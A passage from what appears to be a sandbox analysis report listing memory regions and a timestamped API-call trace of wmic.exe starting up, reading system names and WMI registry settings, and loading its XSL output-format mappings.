= 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2620 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2621 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2622 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2623 start_va = 0x1260000 end_va = 0x1289fff entry_point = 0x1260000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2624 start_va = 0x5370000 end_va = 0x54f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 2625 start_va = 0x5550000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005550000" filename = "" Region: id = 2626 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2627 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2628 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x1220000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 2629 start_va = 0x5960000 end_va = 0x5ae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005960000" filename = "" Region: id = 2630 start_va = 0x5af0000 end_va = 0x6eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005af0000" filename = "" Region: id = 2631 start_va = 0x1260000 end_va = 0x1260fff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 2632 start_va = 0x1270000 end_va = 0x1270fff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 2633 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2634 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2635 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2636 start_va = 0x6ef0000 end_va = 0x709ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ef0000" filename = "" Region: id = 2637 start_va = 0x1280000 end_va = 0x1280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 2638 start_va = 0x6ef0000 end_va = 0x6fa7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006ef0000" filename = "" Region: id = 2639 start_va = 0x7090000 end_va = 0x709ffff entry_point = 0x0 region_type = private name = "private_0x0000000007090000" filename = "" Region: id = 2640 start_va = 0x1280000 end_va = 0x1283fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 2641 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2642 start_va = 0x70a0000 end_va = 0x719ffff entry_point = 0x0 region_type = private name = "private_0x00000000070a0000" filename = "" Region: id = 2643 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2644 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2645 start_va = 0x12b0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2646 start_va = 0x5500000 end_va = 0x553ffff entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 2647 start_va = 0x6fb0000 end_va = 0x6feffff entry_point = 0x0 region_type = private name = "private_0x0000000006fb0000" filename = "" Region: id = 2648 start_va = 0x6ff0000 end_va = 0x702ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ff0000" filename = "" Region: id = 2649 start_va = 0x7030000 end_va = 0x706ffff entry_point = 0x0 region_type = private name = "private_0x0000000007030000" filename = "" Region: id = 2650 start_va = 0x71a0000 end_va = 0x71dffff entry_point = 0x0 region_type = private name = "private_0x00000000071a0000" filename = "" Region: id = 2651 start_va = 0x7dfe7000 end_va = 0x7dfe9fff entry_point = 0x0 region_type = private name = "private_0x000000007dfe7000" filename = "" Region: id = 2652 start_va = 0x7dfea000 end_va = 0x7dfecfff entry_point = 0x0 region_type = private name = "private_0x000000007dfea000" filename = "" Region: id = 2653 start_va = 0x7dfed000 end_va = 0x7dfeffff entry_point = 0x0 region_type = private name = "private_0x000000007dfed000" filename = "" Region: id = 2654 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2655 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2656 start_va = 0x7070000 end_va = 0x7084fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007070000" filename = "" Region: id = 2657 start_va = 0x71e0000 end_va = 0x7208fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000071e0000" filename = "" Thread: id = 197 os_tid = 0xdc4 [0109.415] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0109.415] __set_app_type (_Type=0x1) [0109.415] __p__fmode () returned 0x77ac4d6c [0109.415] __p__commode () returned 0x77ac5b1c [0109.415] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0109.415] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0109.416] ??0CHString@@QAE@XZ () returned 0x13495ec [0109.416] ??0CHString@@QAE@XZ () returned 0x13498fc [0109.416] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0109.416] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0109.416] _onexit (_Func=0x1340a20) returned 0x1340a20 [0109.416] _onexit (_Func=0x1340a30) returned 0x1340a30 [0109.416] _onexit (_Func=0x1340a50) returned 0x1340a50 [0109.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.416] ResolveDelayLoadedAPI () returned 0x770fcd50 [0109.416] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0109.419] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0109.424] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xb86c10) returned 0x0 [0109.434] GetCurrentProcess () returned 0xffffffff [0109.434] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xb2fcb0 | out: TokenHandle=0xb2fcb0*=0x158) returned 1 [0109.434] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb2fcac | out: TokenInformation=0x0, ReturnLength=0xb2fcac) returned 0 [0109.434] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xca3a08, TokenInformationLength=0x118, ReturnLength=0xb2fcac | out: TokenInformation=0xca3a08, ReturnLength=0xb2fcac) returned 1 [0109.435] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xca3a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0109.435] CloseHandle (hObject=0x158) returned 1 [0109.435] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.437] _vsnwprintf (in: _Buffer=0xca3a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xb2fc38 | out: _Buffer="ms_409") returned 6 [0109.437] GetComputerNameW (in: lpBuffer=0xca3ae0, nSize=0xb2fc9c | out: lpBuffer="LHNIWSJ", nSize=0xb2fc9c) returned 1 [0109.437] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.437] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.437] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0109.437] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xb2fcb0 | out: lpNameBuffer=0x0, nSize=0xb2fcb0) returned 0x0 [0109.438] GetLastError () returned 0xea [0109.438] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xca3b20, nSize=0xb2fcb0 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xb2fcb0) returned 0x1 [0109.438] lstrlenW (lpString="") returned 0 [0109.438] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.438] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0109.439] lstrlenW (lpString=".") returned 1 [0109.439] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.439] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0109.439] lstrlenW (lpString="LOCALHOST") returned 9 [0109.439] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.439] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0109.439] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.439] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.439] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0109.439] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.440] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.440] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.440] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.440] ResolveDelayLoadedAPI () returned 0x77bb9840 [0109.442] SysStringLen (param_1="IDENTIFY") returned 0x8 [0109.442] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0109.442] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0109.442] SysStringLen (param_1="IDENTIFY") returned 0x8 [0109.442] SysStringLen (param_1="IMPERSONATE") returned 0xb [0109.442] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0109.442] SysStringLen (param_1="IMPERSONATE") returned 0xb [0109.442] SysStringLen (param_1="IDENTIFY") returned 0x8 [0109.442] SysStringLen (param_1="IDENTIFY") returned 0x8 [0109.442] SysStringLen (param_1="IMPERSONATE") returned 0xb [0109.442] SysStringLen (param_1="DELEGATE") returned 0x8 [0109.442] SysStringLen (param_1="IDENTIFY") returned 0x8 [0109.442] SysStringLen (param_1="DELEGATE") returned 0x8 [0109.442] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0109.442] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0109.442] SysStringLen (param_1="DELEGATE") returned 0x8 [0109.442] SysStringLen (param_1="NONE") returned 0x4 [0109.442] SysStringLen (param_1="DEFAULT") returned 0x7 [0109.442] SysStringLen (param_1="DEFAULT") returned 0x7 [0109.442] SysStringLen (param_1="NONE") returned 0x4 [0109.442] SysStringLen (param_1="CONNECT") returned 0x7 [0109.443] SysStringLen (param_1="DEFAULT") returned 0x7 [0109.443] SysStringLen (param_1="CALL") returned 0x4 [0109.443] SysStringLen (param_1="DEFAULT") returned 0x7 [0109.443] SysStringLen (param_1="CALL") returned 0x4 [0109.443] SysStringLen (param_1="CONNECT") returned 0x7 [0109.443] SysStringLen (param_1="PKT") returned 0x3 [0109.443] SysStringLen (param_1="DEFAULT") returned 0x7 [0109.443] SysStringLen (param_1="PKT") returned 0x3 [0109.443] SysStringLen (param_1="NONE") returned 0x4 [0109.443] SysStringLen (param_1="NONE") returned 0x4 [0109.443] SysStringLen (param_1="PKT") returned 0x3 [0109.443] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0109.443] SysStringLen (param_1="DEFAULT") returned 0x7 [0109.443] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0109.443] SysStringLen (param_1="NONE") returned 0x4 [0109.443] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0109.443] SysStringLen (param_1="PKT") returned 0x3 [0109.443] SysStringLen (param_1="PKT") returned 0x3 [0109.443] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0109.443] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0109.443] SysStringLen (param_1="DEFAULT") returned 0x7 [0109.444] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0109.444] SysStringLen (param_1="PKT") returned 0x3 [0109.444] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0109.444] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0109.444] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0109.444] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0109.444] GetSystemDirectoryW (in: lpBuffer=0xca29d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.444] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0109.444] SysStringLen (param_1="\\wbem\\") returned 0x6 [0109.444] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0109.444] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0109.444] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0109.444] GetCurrentThreadId () returned 0xdc4 [0109.444] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xb2f7c0 | out: phkResult=0xb2f7c0*=0x164) returned 0x0 [0109.444] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xb2f7cc, lpcbData=0xb2f7c8*=0x400 | out: lpType=0x0, lpData=0xb2f7cc*=0x30, lpcbData=0xb2f7c8*=0x4) returned 0x0 [0109.444] _wcsicmp (_String1="0", _String2="1") returned -1 [0109.444] _wcsicmp (_String1="0", _String2="2") returned -2 [0109.444] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xb2f7c8*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xb2f7c8*=0x42) returned 0x0 [0109.444] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xca2be0, lpcbData=0xb2f7c8*=0x42 | out: lpType=0x0, lpData=0xca2be0*=0x25, lpcbData=0xb2f7c8*=0x42) returned 0x0 [0109.444] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0109.444] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0109.445] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xb2f7cc, lpcbData=0xb2f7c8*=0x400 | out: lpType=0x0, lpData=0xb2f7cc*=0x36, lpcbData=0xb2f7c8*=0xc) returned 0x0 [0109.445] _wtol (_String="65536") returned 65536 [0109.445] RegCloseKey (hKey=0x0) returned 0x6 [0109.445] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xb2fc60 | out: ppv=0xb2fc60*=0xc945a8) returned 0x0 [0109.454] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xc945a8, xmlSource=0xb2fbe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xb2fc44 | out: isSuccessful=0xb2fc44*=0xffff) returned 0x0 [0109.500] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xc945a8, DOMElement=0xb2fc58 | out: DOMElement=0xb2fc58) returned 0x0 [0109.501] SysStringLen (param_1="VALUE") returned 0x5 [0109.501] SysStringLen (param_1="TABLE") returned 0x5 [0109.501] SysStringLen (param_1="TABLE") returned 0x5 [0109.501] SysStringLen (param_1="VALUE") returned 0x5 [0109.501] SysStringLen (param_1="LIST") returned 0x4 [0109.501] SysStringLen (param_1="TABLE") returned 0x5 [0109.502] SysStringLen (param_1="RAWXML") returned 0x6 [0109.502] SysStringLen (param_1="TABLE") returned 0x5 [0109.502] SysStringLen (param_1="RAWXML") returned 0x6 [0109.502] SysStringLen (param_1="LIST") returned 0x4 [0109.502] SysStringLen (param_1="LIST") returned 0x4 [0109.502] SysStringLen (param_1="RAWXML") returned 0x6 [0109.502] SysStringLen (param_1="HTABLE") returned 0x6 [0109.502] SysStringLen (param_1="TABLE") returned 0x5 [0109.502] SysStringLen (param_1="HTABLE") returned 0x6 [0109.502] SysStringLen (param_1="LIST") returned 0x4 [0109.502] SysStringLen (param_1="HFORM") returned 0x5 [0109.502] SysStringLen (param_1="TABLE") returned 0x5 [0109.503] SysStringLen (param_1="HFORM") returned 0x5 [0109.503] SysStringLen (param_1="LIST") returned 0x4 [0109.503] SysStringLen (param_1="HFORM") returned 0x5 [0109.503] SysStringLen (param_1="HTABLE") returned 0x6 [0109.503] SysStringLen (param_1="XML") returned 0x3 [0109.503] SysStringLen (param_1="TABLE") returned 0x5 [0109.503] SysStringLen (param_1="XML") returned 0x3 [0109.503] SysStringLen (param_1="VALUE") returned 0x5 [0109.503] SysStringLen (param_1="VALUE") returned 0x5 [0109.503] SysStringLen (param_1="XML") returned 0x3 [0109.503] SysStringLen (param_1="MOF") returned 0x3 [0109.503] SysStringLen (param_1="TABLE") returned 0x5 [0109.503] SysStringLen (param_1="MOF") returned 0x3 [0109.503] SysStringLen (param_1="LIST") returned 0x4 [0109.503] SysStringLen (param_1="MOF") returned 0x3 [0109.503] SysStringLen (param_1="RAWXML") returned 0x6 [0109.503] SysStringLen (param_1="LIST") returned 0x4 [0109.503] SysStringLen (param_1="MOF") returned 0x3 [0109.504] SysStringLen (param_1="CSV") returned 0x3 [0109.504] SysStringLen (param_1="TABLE") returned 0x5 [0109.504] SysStringLen (param_1="CSV") returned 0x3 [0109.504] SysStringLen (param_1="LIST") returned 0x4 [0109.504] SysStringLen (param_1="CSV") returned 0x3 [0109.504] SysStringLen (param_1="HTABLE") returned 0x6 [0109.504] SysStringLen (param_1="CSV") returned 0x3 [0109.504] SysStringLen (param_1="HFORM") returned 0x5 [0109.505] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.505] SysStringLen (param_1="TABLE") returned 0x5 [0109.505] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.505] SysStringLen (param_1="VALUE") returned 0x5 [0109.505] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.505] SysStringLen (param_1="XML") returned 0x3 [0109.505] SysStringLen (param_1="XML") returned 0x3 [0109.505] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.505] SysStringLen (param_1="texttablewsys") returned 0xd [0109.505] SysStringLen (param_1="TABLE") returned 0x5 [0109.505] SysStringLen (param_1="texttablewsys") returned 0xd [0109.505] SysStringLen (param_1="XML") returned 0x3 [0109.505] SysStringLen (param_1="texttablewsys") returned 0xd [0109.505] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.505] SysStringLen (param_1="XML") returned 0x3 [0109.505] SysStringLen (param_1="texttablewsys") returned 0xd [0109.505] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.505] SysStringLen (param_1="TABLE") returned 0x5 [0109.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.506] SysStringLen (param_1="XML") returned 0x3 [0109.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.506] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0109.506] SysStringLen (param_1="TABLE") returned 0x5 [0109.506] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0109.506] SysStringLen (param_1="XML") returned 0x3 [0109.506] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0109.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.506] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0109.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.506] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0109.506] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.506] SysStringLen (param_1="TABLE") returned 0x5 [0109.507] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.507] SysStringLen (param_1="XML") returned 0x3 [0109.507] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.507] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.507] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.507] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.507] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.507] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.507] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0109.507] SysStringLen (param_1="TABLE") returned 0x5 [0109.507] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0109.507] SysStringLen (param_1="XML") returned 0x3 [0109.507] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0109.507] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.507] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0109.507] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.507] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0109.507] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.507] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.507] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0109.508] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0109.508] SysStringLen (param_1="TABLE") returned 0x5 [0109.508] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0109.508] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.508] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0109.508] SysStringLen (param_1="XML") returned 0x3 [0109.508] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0109.508] SysStringLen (param_1="texttablewsys") returned 0xd [0109.508] SysStringLen (param_1="XML") returned 0x3 [0109.508] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0109.508] SysStringLen (param_1="htable-sortby") returned 0xd [0109.508] SysStringLen (param_1="TABLE") returned 0x5 [0109.508] SysStringLen (param_1="htable-sortby") returned 0xd [0109.508] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.508] SysStringLen (param_1="htable-sortby") returned 0xd [0109.508] SysStringLen (param_1="XML") returned 0x3 [0109.508] SysStringLen (param_1="htable-sortby") returned 0xd [0109.508] SysStringLen (param_1="texttablewsys") returned 0xd [0109.508] SysStringLen (param_1="htable-sortby") returned 0xd [0109.508] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0109.508] SysStringLen (param_1="XML") returned 0x3 [0109.508] SysStringLen (param_1="htable-sortby") returned 0xd [0109.509] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0109.509] SysStringLen (param_1="TABLE") returned 0x5 [0109.509] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0109.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.509] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0109.509] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.509] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0109.509] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0109.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.509] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0109.509] SysStringLen (param_1="wmiclimofformat") returned 0xf [0109.509] SysStringLen (param_1="TABLE") returned 0x5 [0109.509] SysStringLen (param_1="wmiclimofformat") returned 0xf [0109.509] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.509] SysStringLen (param_1="wmiclimofformat") returned 0xf [0109.509] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.509] SysStringLen (param_1="wmiclimofformat") returned 0xf [0109.509] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0109.509] SysStringLen (param_1="wmiclimofformat") returned 0xf [0109.509] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0109.509] 